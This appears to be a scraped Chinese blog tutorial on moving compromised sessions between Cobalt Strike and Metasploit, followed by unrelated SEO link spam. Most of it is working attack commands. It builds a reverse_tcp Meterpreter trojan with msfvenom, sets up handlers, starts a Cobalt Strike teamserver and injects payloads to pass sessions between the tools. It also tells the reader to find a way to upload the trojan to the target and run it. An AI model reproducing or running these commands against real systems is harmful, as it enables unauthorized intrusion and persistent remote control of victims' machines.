当前位置: 首页 > news >正文

网站建设专家论证会广州今日头条新闻最新

网站建设专家论证会,广州今日头条新闻最新,新浪云 安装wordpress,接外贸订单的平台内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 ) 在渗透中,有时候 Cobalt Strike 会话可能会受限制,所以我们需要把 Cobalt Strike 会话转移到 MSF 上进行后面的渗透。也有的时候会话在 MSF 上,但是…

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

在渗透中,有时候 Cobalt Strike 会话可能会受限制,所以我们需要把 Cobalt Strike 会话转移到 MSF 上进行后面的渗透。也有的时候会话在 MSF 上,但是我们需要 操作更简便 或者 展示力更好,所以我们会把 MSF 上的会话转移到 Cobalt Strike 上进行后面的渗透.


目录:

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

在 MSF 会话中 转移 会话到 CS 上.

(1)上线 MSF 会话.

(2)进行监听模式.

(3)开启 Cobalt Strike 工具.

(4)添加一个监听.

(5)会话转移到 CS 中.

在 CS 会话中 转移 会话到 MSF 上.

(1)开启 Cobalt Strike 工具.

(2)添加一个监听.

(3)生成一个程序.(木马)

(4)重新添加一个监听器.

(5)会话转移到 MSF 中.


在 MSF 会话中 转移 会话到 CS 上.

(1)上线 MSF 会话.

生成一个程序后面(木马):msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4422 -f exe > bgxg.exe


(2)进行监听模式.

(1)msfconsole(2)use exploit/multi/handler(3)set payload windows/meterpreter/reverse_tcp(4)set lhost 192.168.0.106                            # 本地 IP 地址(5)set LPORT 4422                                     # 和后面一样的端口(6)run


(3)开启 Cobalt Strike 工具.

服务端:(1)cd cs4.7        //切换为 cs 目录(2)chmod a+x ./TeamServerImage         // 修改权限.(3)./teamserver 192.168.0.106 888888   //这里的IP地址是 服务端的IP,后面的是客户端的登录密码.


客户端:(1)cd cs4.7        // 切换为 cs 目录(2)./start.sh        // 打开 客户端.


(4)添加一个监听.


(5)会话转移到 CS 中.

(1)background                // 挂起 会话.(2)use exploit/windows/local/payload_inject(3)set payload windows/meterpreter/reverse_http(4)set lhost 192.168.0.101        //设置 CS 服务端的 IP 地址.(5)set lport 8080               //设置 CS 服务端的 监听的端口(刚刚上面创建的端口号一样[CS的])(6)set DisablePayloadHandler True(7)set PrependMigrate True(8)sessions -l  //查看 会话 是多少则设置多少(9)set session 1 [一般是 1(上面查看的结果)](10)exploit      // 进行 测试.


在 CS 会话中 转移 会话到 MSF 上.

(1)开启 Cobalt Strike 工具.

服务端:(1)cd cs4.7        //切换为 cs 目录(2)chmod a+x ./TeamServerImage         // 修改权限.(3)./teamserver 192.168.0.106 888888   //这里的IP地址是 服务端的IP,后面的是客户端的登录密码.


客户端:(1)cd cs4.7        // 切换为 cs 目录(2)./start.sh        // 打开 客户端.


(2)添加一个监听.


(3)生成一个程序.(木马)

想方法,把这个程序上传到目标主机并执行这个执行.


(4)重新添加一个监听器.


(5)会话转移到 MSF 中.

(1)msfconsole                    // 打开 MSF 工具(2)use exploit/multi/handler                                   // 设置 监听 模块.(3)set payload windows/meterpreter/reverse_http                // 设置 payload(4)set lport 9999                        // 设置一个端口(和上面的监听一样的端口)(5)set lhost 0.0.0.0                    // 设置本地的 IP 地址(6)exploit                              // 进行测试

       

       

       

http://www.tj-hxxt.cn/news/108081.html

相关文章:

  • 宝鸡市做网站的公司有哪些seo包括哪些方面
  • 桃源网站建设百度2018旧版下载
  • 网站建设与维护合同范本浙江网站推广
  • 网站制作入门网上推广产品怎么做
  • 广东建设工程招标网站线上卖货平台有哪些
  • 番禺外贸型网站建设网络销售平台上市公司有哪些
  • 有什么推荐做简历的网站青岛排名推广
  • 信誉好的武汉网站建设裂变营销
  • 唐山网站建设唐山做网站长沙优化官网服务
  • 做360全景的网站大连seo关键词排名
  • 在线客服系统多少钱seo诊断书
  • 男女做暖暖插孔网站百度爱采购怎么推广
  • 怎么申请pc网站域名seo编辑的工作内容
  • 建站基础:wordpress安装教程图解 - 天缘博客如何自己做网页
  • jsp网站购物车怎么做恢复正常百度
  • 网络平台制作多少钱淘宝关键词排名优化技巧
  • 旅游网站建设目的短视频关键词seo优化
  • 凡网站建设网站优化方法
  • 工业设计 做自己的网站 知乎搜索引擎优化排名优化培训
  • 网页设计教程文字和图片宁波网站推广优化公司电话
  • 包头建站百度搜索引擎优化怎么做
  • 建设积分商城网站公司网站的作用
  • 随州网站建设优化推广渠道抖音推广运营公司
  • 手机查看别人网站代码吗海外aso优化
  • 长沙网站推广公司排名我赢网客服系统
  • 品牌网站怎么做发帖推广
  • 从做系统网站的收藏怎么找回36优化大师下载安装
  • 怎样用java做网站优化大师win10
  • 网站主办者是什么意思广州网络推广公司排名
  • 免费企业网站开发群推广